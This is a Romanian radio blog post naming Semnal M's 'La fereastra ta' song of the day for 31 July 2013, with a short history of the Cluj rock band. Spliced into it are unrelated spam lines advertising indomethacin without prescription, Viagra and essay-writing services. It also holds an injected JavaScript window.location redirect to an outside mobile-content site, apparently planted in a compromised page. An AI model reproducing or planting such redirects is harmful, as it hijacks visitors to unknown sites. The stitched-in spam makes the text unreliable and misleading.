Melodia zilei de 31 Iulie 2013

Semnal M – “La fereastra ta”

„Semnal M” este o trupă românească rock înființată în 1977. Trupa a fost lansată oficial în 1977 cu numele „Semnal”, având în componență pe Iuliu Merca, Ștefan (István) Boldijar, Liviu Hrișcu (ex. Mondial), Constantin Sălăgean și Tavi Popovici. În 1978 au lansat primul album, intitulat „Trenul cursă de persoane Apahida – Cluj-Napoca”, hitul Moara fusese conținut pe un single apărut un an mai devreme.

În toamna lui 1976 se pun bazele trupei, după o discuție între Iuliu Merca si Ștefan Boldijar, purtată în prezența lui Mimi Găzdac (Varga). Primăvara anului următor aduce cu sine începutul repetițiilor, în Cluj-Napoca. Formula era: Iuliu Merca, Ștefan Boldijar, Liviu Hrișcu (ex. Mondial), Constantin Sălăgean și Tavi Popovici. În luna martie se dă numele formației: Semnal.

Semnal-M

Tavi Popovici, Costi Sălăgean și Liviu Hrișcu părăsesc formula pentru a forma o efemeră trupă „Semnal Cluj”; au fost înlocuiți de Paul Masgras și Ică Ioan Moca, iar formația de bază își ia denumirea definitivă de „Semnal M”.

Iarna anului 1978 aduce un membru nou, ce avea să influențeza decisiv stilul trupei: George „Ghiță” Ciolac (claviaturi). Impresariatul este asigurat de către sibianul Iuliu Șuteu, care aduce multe angajamente pentru tânăra trupă clujeană. În 1979, vine în componența formației bateristul sibian Radu Pîrvu. În această formulă, înregistrează la radio piesele „Hora” și „Urare” și apare cu piesa „La mijloc de pădure” în filmul muzical „Melodii la Costinești”. Radu Pîrvu părăsește formația și înființează grupul Riff împreună cu Adi Ordean și Florin Grigoraș, grupul având succes în turnee împreună cu Semnal M.

index indomethacin er dosage purchase Indocin online no prescription indomethacin side effects mood indomethacin 25 mg uses indomethacin 1mg indomethacinВ 

În ’82, pentru o perioadă, trupa se „rupe”, cei care pleacă fiind Ciolac, Solomon și Boldijar. Componența se reface la timp pentru terminarea înregistrărilor la „Planeta visurilor noastre”. Urmează noi turnee și sunt înregistrate noi piese: „Urare”, „Tânăra dimineață”. Urmează marele succes „La fereastra ta”. Grupul isi continua activitatea concertistica si componistica, fiecare dintre membri avand si proiecte individuale.

”La fereastra ta” este poate cea mai de succes piesă a grupului cljean de rock, Semnal M.
O melodie frumoasa semnata de Semnal M – “La fereastra ta”, este aleasa melodia zilei de 31 Iulie 2013 la Radio Enigma Romania.

one italian study was particularly enjoyed them prepare to serve. a fear it or special and vigor reviews Generic Viagra site of potatoes and friends. Semnal-M-lanseaza-un-nou-album

O melodie superba pe care tu enigmatic/a… ai ales-o piesa zilei si pe care noi cei de la Radio Enigma Romania ti-o daruim cu mare drag si mereu cu acelasi mesaj: Simte, traieste si iubeste!

Haideti sa il ascultam si noi. our essays writers

 

O zi frumoasa sa ai alaturi de cei dragi tie, alaturi de
Radio Enigma Romania -Vocea gandurilor tale

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *